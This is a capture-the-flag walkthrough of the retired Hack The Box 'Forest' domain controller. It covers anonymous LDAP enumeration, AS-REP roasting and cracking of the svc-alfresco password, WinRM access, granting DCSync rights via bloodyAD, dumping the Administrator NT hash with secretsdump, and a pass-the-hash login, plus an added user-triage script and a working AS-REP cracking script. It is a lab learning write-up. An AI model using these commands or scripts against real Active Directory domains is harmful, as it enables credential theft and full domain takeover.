Machine Info
- IP: 10.129.95.210
- Status: Retired
- Link: https://app.hackthebox.com/machines/Forest
Recon
$ nmap -sSV -p- -oA 1_init_nmap 10.129.95.210
Starting Nmap 7.95 ( https://nmap.org ) at 2026-06-18 20:42 EDT
Nmap scan report for 10.129.95.210
Host is up (0.057s latency).
Not shown: 65511 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-06-19 00:49:04Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
49680/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49681/tcp open msrpc Microsoft Windows RPC
49685/tcp open msrpc Microsoft Windows RPC
49700/tcp open msrpc Microsoft Windows RPC
55838/tcp open msrpc Microsoft Windows RPC
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 78.50 seconds
The port mix (DNS on 53, Kerberos on 88, LDAP on 389/636 plus the Global Catalog on 3268/3269, and WinRM on 5985) makes this a Windows domain controller for htb.local. nmap's OS guess of Server 2008 R2 - 2012 comes from the SMB banner and is worth checking against a better source. One thing to note now: the Kerberos banner reports a server time of 00:49Z while our scan started at 20:42 EDT (00:42Z), so the DC's clock is several minutes ahead of ours. Kerberos tolerates 5 minutes of skew by default, so if Kerberos-based tooling later fails with a clock skew error, sync against the DC first (for example with ntpdate 10.129.95.210).
Added htb.local and forest.htb.local to /etc/hosts.
smb
smbclient -N -L \\\\htb.local allows a null (anonymous) session but lists no shares.
$ nxc smb htb.local --disks
SMB 10.129.95.210 445 FOREST [*] Windows 10 / Server 2016 Build 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True)
$ nxc smb 10.129.95.210 -u '' -p '' -d HTB.LOCAL --pass-pol
SMB 10.129.95.210 445 FOREST [*] Windows 10 / Server 2016 Build 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True)
SMB 10.129.95.210 445 FOREST [+] HTB.LOCAL\:
SMB 10.129.95.210 445 FOREST [+] Dumping password info for domain: HTB
SMB 10.129.95.210 445 FOREST Minimum password length: 7
SMB 10.129.95.210 445 FOREST Password history length: 24
SMB 10.129.95.210 445 FOREST Maximum password age: Not Set
SMB 10.129.95.210 445 FOREST
SMB 10.129.95.210 445 FOREST Password Complexity Flags: 000000
SMB 10.129.95.210 445 FOREST Domain Refuse Password Change: 0
SMB 10.129.95.210 445 FOREST Domain Password Store Cleartext: 0
SMB 10.129.95.210 445 FOREST Domain Password Lockout Admins: 0
SMB 10.129.95.210 445 FOREST Domain Password No Clear Change: 0
SMB 10.129.95.210 445 FOREST Domain Password No Anon Change: 0
SMB 10.129.95.210 445 FOREST Domain Password Complex: 0
SMB 10.129.95.210 445 FOREST
SMB 10.129.95.210 445 FOREST Minimum password age: 1 day 4 minutes
SMB 10.129.95.210 445 FOREST Reset Account Lockout Counter: 30 minutes
SMB 10.129.95.210 445 FOREST Locked Account Duration: 30 minutes
SMB 10.129.95.210 445 FOREST Account Lockout Threshold: None
SMB 10.129.95.210 445 FOREST Forced Log off Time: Not Set
This confirms the hostname (FOREST), the domain (htb.local) and the build: Server 2016, build 14393, rather than the 2008 R2 - 2012 range nmap guessed from the SMB banner. The password policy is weak: minimum length 7, no complexity requirement, and no account lockout threshold, so password spraying against the user list would not lock anyone out. Note also signing:True, which means SMB signing is enforced on the DC and rules out relaying to it.
ldap
LDAP also accepts an anonymous bind, which is enough to list every domain user:
$ nxc ldap forest.htb.local --dns-server 10.129.95.210 -d HTB.LOCAL -u '' -p '' --users
LDAP 10.129.95.210 389 FOREST [*] Windows 10 / Server 2016 Build 14393 (name:FOREST) (domain:htb.local)
LDAP 10.129.95.210 389 FOREST [+] HTB.LOCAL\:
LDAP 10.129.95.210 389 FOREST [*] Enumerated 31 domain users: HTB.LOCAL
LDAP 10.129.95.210 389 FOREST -Username- -Last PW Set- -BadPW- -Description-
LDAP 10.129.95.210 389 FOREST Administrator 2021-08-30 20:51:58 0 Built-in account for administering the computer/domain
LDAP 10.129.95.210 389 FOREST Guest <never> 0 Built-in account for guest access to the computer/domain
LDAP 10.129.95.210 389 FOREST DefaultAccount <never> 0 A user account managed by the system.
LDAP 10.129.95.210 389 FOREST krbtgt 2019-09-18 06:53:23 0 Key Distribution Center Service Account
LDAP 10.129.95.210 389 FOREST $331000-VK4ADACQNUCA <never> 0
LDAP 10.129.95.210 389 FOREST SM_2c8eef0a09b545acb <never> 0
LDAP 10.129.95.210 389 FOREST SM_ca8c2ed5bdab4dc9b <never> 0
LDAP 10.129.95.210 389 FOREST SM_75a538d3025e4db9a <never> 0
LDAP 10.129.95.210 389 FOREST SM_681f53d4942840e18 <never> 0
LDAP 10.129.95.210 389 FOREST SM_1b41c9286325456bb <never> 0
LDAP 10.129.95.210 389 FOREST SM_9b69f1b9d2cc45549 <never> 0
LDAP 10.129.95.210 389 FOREST SM_7c96b981967141ebb <never> 0
LDAP 10.129.95.210 389 FOREST SM_c75ee099d0a64c91b <never> 0
LDAP 10.129.95.210 389 FOREST SM_1ffab36a2f5f479cb <never> 0
LDAP 10.129.95.210 389 FOREST HealthMailboxc3d7722 2019-09-23 18:51:31 0
LDAP 10.129.95.210 389 FOREST HealthMailboxfc9daad 2019-09-23 18:51:35 0
LDAP 10.129.95.210 389 FOREST HealthMailboxc0a90c9 2019-09-19 07:56:35 0
LDAP 10.129.95.210 389 FOREST HealthMailbox670628e 2019-09-19 07:56:45 0
LDAP 10.129.95.210 389 FOREST HealthMailbox968e74d 2019-09-19 07:56:56 0
LDAP 10.129.95.210 389 FOREST HealthMailbox6ded678 2019-09-19 07:57:06 0
LDAP 10.129.95.210 389 FOREST HealthMailbox83d6781 2019-09-19 07:57:17 0
LDAP 10.129.95.210 389 FOREST HealthMailboxfd87238 2019-09-19 07:57:27 0
LDAP 10.129.95.210 389 FOREST HealthMailboxb01ac64 2019-09-19 07:57:37 0
LDAP 10.129.95.210 389 FOREST HealthMailbox7108a4e 2019-09-19 07:57:48 0
LDAP 10.129.95.210 389 FOREST HealthMailbox0659cc1 2019-09-19 07:57:58 0
LDAP 10.129.95.210 389 FOREST sebastien 2019-09-19 20:29:59 0
LDAP 10.129.95.210 389 FOREST lucinda 2019-09-19 20:44:13 0
LDAP 10.129.95.210 389 FOREST svc-alfresco 2026-06-18 21:05:00 0
LDAP 10.129.95.210 389 FOREST andy 2019-09-22 18:44:16 0
LDAP 10.129.95.210 389 FOREST mark 2019-09-20 18:57:30 0
LDAP 10.129.95.210 389 FOREST santi 2019-09-20 19:02:55 0
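Filtering a dump like this is mostly about knowing which names are noise. The following is an added example (my code, not part of the original write-up) that parses the nxc --users table and buckets accounts into built-in, Exchange-generated (SM_*, HealthMailbox*, $...), service and ordinary users, then emits the list worth feeding to an AS-REP roast or a spray. The name prefixes it keys on are assumptions about common naming conventions, and the embedded sample is a subset of the rows above, banner and header lines included so the parser has to skip them.

```python
# Added example (not the write-up's code): triage of the `nxc ldap --users`
# dump above into roast/spray targets. The categories and name prefixes are
# this script's own assumptions about what Windows and Exchange create.
import re

# One table row: LDAP <ip> <port> <host> <user> (<never>|<date time>) <badpw> [description]
ROW = re.compile(
    r"^LDAP\s+\S+\s+\d+\s+\S+\s+(?P<user>\S+)\s+"
    r"(?P<pwdset><never>|\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\s+"
    r"(?P<badpw>\d+)(?:\s+(?P<desc>.*))?$"
)
BUILTIN = {"Administrator", "Guest", "DefaultAccount", "krbtgt"}
EXCHANGE_PREFIXES = ("SM_", "HealthMailbox", "$")  # created by Exchange setup, never interactive
SERVICE_PREFIXES = ("svc", "sa_")                   # assumed service-account naming convention

# Subset of the rows from the dump above; banner and header lines kept on purpose.
SAMPLE = """\
LDAP 10.129.95.210 389 FOREST [*] Windows 10 / Server 2016 Build 14393 (name:FOREST) (domain:htb.local)
LDAP 10.129.95.210 389 FOREST -Username- -Last PW Set- -BadPW- -Description-
LDAP 10.129.95.210 389 FOREST Administrator 2021-08-30 20:51:58 0 Built-in account for administering the computer/domain
LDAP 10.129.95.210 389 FOREST Guest <never> 0 Built-in account for guest access to the computer/domain
LDAP 10.129.95.210 389 FOREST krbtgt 2019-09-18 06:53:23 0 Key Distribution Center Service Account
LDAP 10.129.95.210 389 FOREST $331000-VK4ADACQNUCA <never> 0
LDAP 10.129.95.210 389 FOREST SM_2c8eef0a09b545acb <never> 0
LDAP 10.129.95.210 389 FOREST HealthMailboxc3d7722 2019-09-23 18:51:31 0
LDAP 10.129.95.210 389 FOREST sebastien 2019-09-19 20:29:59 0
LDAP 10.129.95.210 389 FOREST lucinda 2019-09-19 20:44:13 0
LDAP 10.129.95.210 389 FOREST svc-alfresco 2026-06-18 21:05:00 0
LDAP 10.129.95.210 389 FOREST andy 2019-09-22 18:44:16 0
LDAP 10.129.95.210 389 FOREST mark 2019-09-20 18:57:30 0
LDAP 10.129.95.210 389 FOREST santi 2019-09-20 19:02:55 0
"""


def parse_users(text):
    """One dict per table row; banner and header lines do not match and are skipped."""
    return [m.groupdict() for m in (ROW.match(l.strip()) for l in text.splitlines()) if m]


def triage(text):
    """Bucket accounts so real people and service accounts stand out from the noise."""
    buckets = {"builtin": [], "exchange": [], "service": [], "users": []}
    for row in parse_users(text):
        name = row["user"]
        if name in BUILTIN:
            buckets["builtin"].append(name)
        elif name.startswith(EXCHANGE_PREFIXES):
            buckets["exchange"].append(name)
        elif name.lower().startswith(SERVICE_PREFIXES):
            buckets["service"].append(name)
        else:
            buckets["users"].append(name)
    return buckets


def roast_targets(text):
    """Names to write to users.txt for `nxc ldap ... -u users.txt -p '' --asreproast`
    or a spray: service accounts first (most likely to have pre-auth disabled), then people."""
    b = triage(text)
    return b["service"] + b["users"]


if __name__ == "__main__":
    for bucket, names in triage(SAMPLE).items():
        print(f"{bucket:9s} {', '.join(names)}")
    print("\n".join(roast_targets(SAMPLE)))
```

The parser keys on the fixed columns nxc prints (last password set, bad password count) rather than on the username, so a username containing spaces or odd characters still lands in the right bucket as long as the timestamp column is intact.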
Some additional commands run with nxc ldap:
- --password-not-required returned 3 disabled accounts.
- --groups (group membership):
  - Administrators / Domain Admins / GPO Owners: Administrator
  - Remote Mgmt Users / Privileged IT Accounts / Service Accounts: svc-alfresco
  - Exchange Servers: EXCH01
  - test: no members, but interesting
There's a mention of another Exchange server, but I cannot seem to find it with dig or nslookup. I set EXCH01 to the same IP in /etc/hosts for now. (Membership in Exchange Servers only shows that the computer object exists in AD; a host that does not resolve is most likely not on the network.)
A final unauthenticated test is AS-REP roasting and Kerberoasting.
$ nxc ldap forest.htb.local --dns-server 10.129.95.210 -d HTB.LOCAL -u svc-alfresco -p '' --asreproast ASREPROAST.txt
LDAP 10.129.95.210 389 FOREST [*] Windows 10 / Server 2016 Build 14393 (name:FOREST) (domain:htb.local)
LDAP 10.129.95.210 389 FOREST $krb5asrep$23$svc-alfresco@HTB.LOCAL:664e77945c393d782f226b3383a42f05$18394d700febb061b4edf997cd12b661366893e0ce5dc8eec289b722abbe0152d831ea680070a9e30014802505522e25ba17138ceea638899e32f9a2fec4efba0234addf2edaac3f6e3f846ba753e55d02a8b51e0bca513f1a35b606136c2e8a4c78ac835ad40b41cdba535bf92c4b07affd5e9e6282997f39d070f32a25f6b284e449a4a88820540cfb0a49e7b1e8e63b36e71187f453d861fd86ca0ed120f38831bf494b6a2266988dc354ed13796217b4600a0c5cb79d111c8c9ae7894985fe7fa9f0654a0207408cbe416db2d65f205b28ff41c7c8a7447b62bcbd571cee0c877d4bbd6b
$ nxc ldap forest.htb.local --dns-server 10.129.95.210 -d HTB.LOCAL -u svc-alfresco -p '' --kerberoast kerberoast.txt
LDAP 10.129.95.210 389 FOREST [*] Windows 10 / Server 2016 Build 14393 (name:FOREST) (domain:htb.local)
LDAP 10.129.95.210 389 FOREST [-] HTB.LOCAL\svc-alfresco:
The AS-REP roast returns a hash for svc-alfresco. That only happens when an account has "Do not require Kerberos preauthentication" set: the KDC then hands an AS-REP encrypted under the account's password-derived key to anyone who asks for one, which is why this works with an empty password. Kerberoasting is different: it needs an authenticated principal to request service tickets, and the [-] above shows the empty-password bind failed, so it is worth retrying once we have valid credentials. Since we have an AS-REP hash, we can attempt to crack it offline with hashcat mode 18200:
$ hashcat -m18200 ASREPROAST.txt /usr/share/wordlists/rockyou.txt
...
$krb5asrep$23$svc-alfresco@HTB.LOCAL:664e77945c393d782f226b3383a42f05$18394d700febb061b4edf997cd12b661366893e0ce5dc8eec289b722abbe0152d831ea680070a9e30014802505522e25ba17138ceea638899e32f9a2fec4efba0234addf2edaac3f6e3f846ba753e55d02a8b51e0bca513f1a35b606136c2e8a4c78ac835ad40b41cdba535bf92c4b07affd5e9e6282997f39d070f32a25f6b284e449a4a88820540cfb0a49e7b1e8e63b36e71187f453d861fd86ca0ed120f38831bf494b6a2266988dc354ed13796217b4600a0c5cb79d111c8c9ae7894985fe7fa9f0654a0207408cbe416db2d65f205b28ff41c7c8a7447b62bcbd571cee0c877d4bbd6b:s3rvice
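Why an AS-REP is crackable offline at all: for etype 23 the KDC encrypts the enc-part with RC4-HMAC under the account's NT hash and prepends an HMAC-MD5 checksum, so anyone holding the blob can test candidate passwords without ever talking to the DC again. The following added example (my code, not the write-up's and not hashcat's) implements that check for the $krb5asrep$23$ format mode 18200 consumes: NT hash via a hand-rolled MD4 (hashlib's md4 is usually unavailable with OpenSSL 3), the RFC 4757 key derivation, RC4 decryption and checksum comparison. It builds its own sample hash from a chosen password and a stand-in enc-part rather than using the captured hash above, and the candidate list is constructed.

```python
# Added example (not the write-up's code): what hashcat -m 18200 checks for a
# $krb5asrep$23$ line. The sample hash at the bottom is CONSTRUCTED by this
# script from a chosen password; it is not the hash captured from the box.
import hashlib
import hmac
import struct

AS_REP_KEY_USAGE = 8  # RFC 4120 key usage number for the AS-REP enc-part


def md4(msg: bytes) -> bytes:
    """MD4 (RFC 1320). Hand-rolled: hashlib's md4 needs OpenSSL's legacy provider."""
    def f(x, y, z): return (x & y) | (~x & z)
    def g(x, y, z): return (x & y) | (x & z) | (y & z)
    def h(x, y, z): return x ^ y ^ z
    def rotl(x, n): return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF
    bits = len(msg) * 8
    msg += b"\x80" + b"\x00" * ((55 - len(msg)) % 64) + struct.pack("<Q", bits)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for i in range(16):  # round 1: F, shifts 3/7/11/19, words in order
            a = rotl((a + f(b, c, d) + x[i]) & 0xFFFFFFFF, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 2: G, shifts 3/5/9/13, words 0,4,8,12,1,5,...
            k = (i % 4) * 4 + i // 4
            a = rotl((a + g(b, c, d) + x[k] + 0x5A827999) & 0xFFFFFFFF, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 3: H, shifts 3/9/11/15, bit-reversed word order
            k = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)[i]
            a = rotl((a + h(b, c, d) + x[k] + 0x6ED9EBA1) & 0xFFFFFFFF, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        state = [(s + v) & 0xFFFFFFFF for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4(UTF-16LE(password)); this is also the RC4-HMAC Kerberos key."""
    return md4(password.encode("utf-16-le"))


def rc4(key: bytes, data: bytes) -> bytes:
    s = list(range(256))
    j = 0
    for i in range(256):  # key scheduling
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:  # keystream generation, XORed onto the data
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def _hmac_md5(key: bytes, data: bytes) -> bytes:
    return hmac.new(key, data, hashlib.md5).digest()


def rc4_hmac_encrypt(key: bytes, usage: int, confounder: bytes, plaintext: bytes):
    """RFC 4757 encryption as the KDC does it: returns (checksum, ciphertext)."""
    k1 = _hmac_md5(key, struct.pack("<I", usage))  # K1 = HMAC(K, usage as LE32)
    data = confounder + plaintext
    checksum = _hmac_md5(k1, data)                 # checksum = HMAC(K1, conf|plain)
    k3 = _hmac_md5(k1, checksum)                   # K3 = HMAC(K1, checksum)
    return checksum, rc4(k3, data)


def rc4_hmac_verify(key: bytes, usage: int, checksum: bytes, ciphertext: bytes) -> bool:
    """The cracker's side: derive K3 from the checksum, decrypt, recompute the HMAC."""
    k1 = _hmac_md5(key, struct.pack("<I", usage))
    data = rc4(_hmac_md5(k1, checksum), ciphertext)
    return hmac.compare_digest(_hmac_md5(k1, data), checksum)


def parse_asrep_line(line: str):
    """'$krb5asrep$23$user@REALM:checksum$edata2' -> (principal, checksum, edata2)."""
    _, tag, etype, ident, edata2 = line.strip().split("$")
    if tag != "krb5asrep" or etype != "23":
        raise ValueError("only etype 23 (RC4-HMAC) AS-REP lines are handled here")
    principal, checksum = ident.split(":", 1)
    return principal, bytes.fromhex(checksum), bytes.fromhex(edata2)


def crack_asrep(line: str, candidates):
    """Return the first candidate password that verifies the AS-REP, else None."""
    _, checksum, edata2 = parse_asrep_line(line)
    for pw in candidates:
        if rc4_hmac_verify(nt_hash(pw), AS_REP_KEY_USAGE, checksum, edata2):
            return pw
    return None


def build_asrep_line(user: str, realm: str, password: str, confounder: bytes = b"\x01" * 8) -> str:
    """Constructed 18200-format line standing in for a real EncASRepPart."""
    plaintext = b"\x79\x10constructed-enc-part"  # stand-in, not real DER
    checksum, ct = rc4_hmac_encrypt(nt_hash(password), AS_REP_KEY_USAGE, confounder, plaintext)
    return f"$krb5asrep$23${user}@{realm}:{checksum.hex()}${ct.hex()}"


if __name__ == "__main__":
    sample = build_asrep_line("svc-alfresco", "HTB.LOCAL", "s3rvice")
    print(sample)
    print(crack_asrep(sample, ["Password1", "Summer2019", "s3rvice"]))  # -> s3rvice
```

The captured line from the nxc output is in exactly this format, so crack_asrep() accepts it unchanged with a wordlist. Note that the principal (user@REALM) never enters the computation for etype 23: RC4-HMAC keys are unsalted NT hashes, which is both why the realm's case does not matter and why a single crack here also yields a reusable NT hash.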
Initial Access
With a username and password, and WinRM (5985) open, we can use evil-winrm to gain access; svc-alfresco is in Remote Management Users per the --groups output above, so the login is permitted:
$ evil-winrm -i 10.129.95.210 -u 'svc-alfresco' -p s3rvice
user.txt is on svc-alfresco's Desktop (\svc-alfresco\Desktop\user.txt).
Post-Exploitation
Let's see what else svc-alfresco can do, since it is a member of a privileged group.
$ nxc ldap forest.htb.local --dns-server 10.129.95.210 -d HTB.LOCAL -u 'svc-alfresco' -p 's3rvice' --bloodhound -c all
It shows our great-grandparent group, Account Operators (svc-alfresco is nested through Service Accounts and Privileged IT Accounts into it), has GenericAll over Exchange Windows Permissions, so we can add ourselves to that group. Exchange Windows Permissions in turn has WriteDacl over the domain root HTB.LOCAL, which lets us write an ACE on the domain object granting ourselves DCSync rights; with those we can pull the Domain Admins' hashes (including Administrator's) rather than having to touch the Domain Admins group directly.
Privilege Escalation
$ bloodyAD -u 'svc-alfresco' -p 's3rvice' -d htb.local --host 10.129.95.210 add groupMember "Exchange Windows Permissions" 'svc-alfresco'
[+] svc-alfresco added to Exchange Windows Permissions
$ bloodyAD -u 'svc-alfresco' -p 's3rvice' -d htb.local --host 10.129.95.210 add dcsync svc-alfresco
[+] svc-alfresco is now able to DCSync
$ impacket-secretsdump -outputfile dcsync -dc-ip 10.129.95.210 HTB/svc-alfresco:s3rvice@htb.local
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
...
$ evil-winrm -i 10.129.95.210 -u Administrator -H "32693b11e6aa90eb43d32c72a07ceea6"
This sequence of commands follows the path BloodHound identified. I noticed we only had a small window after adding ourselves to the group before it seemed to drop back off, so run the two bloodyAD commands back to back: the first puts svc-alfresco in Exchange Windows Permissions, and the second uses that group's WriteDacl on the domain object to grant svc-alfresco the replication extended rights (DS-Replication-Get-Changes and DS-Replication-Get-Changes-All) that DCSync requires. Those rights let secretsdump pull every account's secrets from NTDS.DIT over DRSUAPI; the rpc_s_access_denied line above is expected, since secretsdump first tries the remote registry (SAM/LSA) method, which needs local administrator, before falling back to DRSUAPI. With the Administrator NT hash we pass the hash over WinRM (-H) to log in. The flag is on the Administrator's desktop. On a real engagement, undo both changes afterwards (bloodyAD has matching remove dcsync and remove groupMember subcommands): a leftover DCSync ACE on the domain object is a persistent backdoor.
Conclusion
A nice introductory Active Directory box. Active Directory is still a weak point for me, so I need more practice on how to filter out noise and identify what paths like GenericAll and WriteDacl mean.
It was also a novel way of exploitation for me. Traditionally, when I gain initial access, I expect some sort of vulnerable application to exploit for privilege escalation. Active Directory has not been a focus for me, but there is a plethora of information in AD that can help with lateral movement or privilege escalation.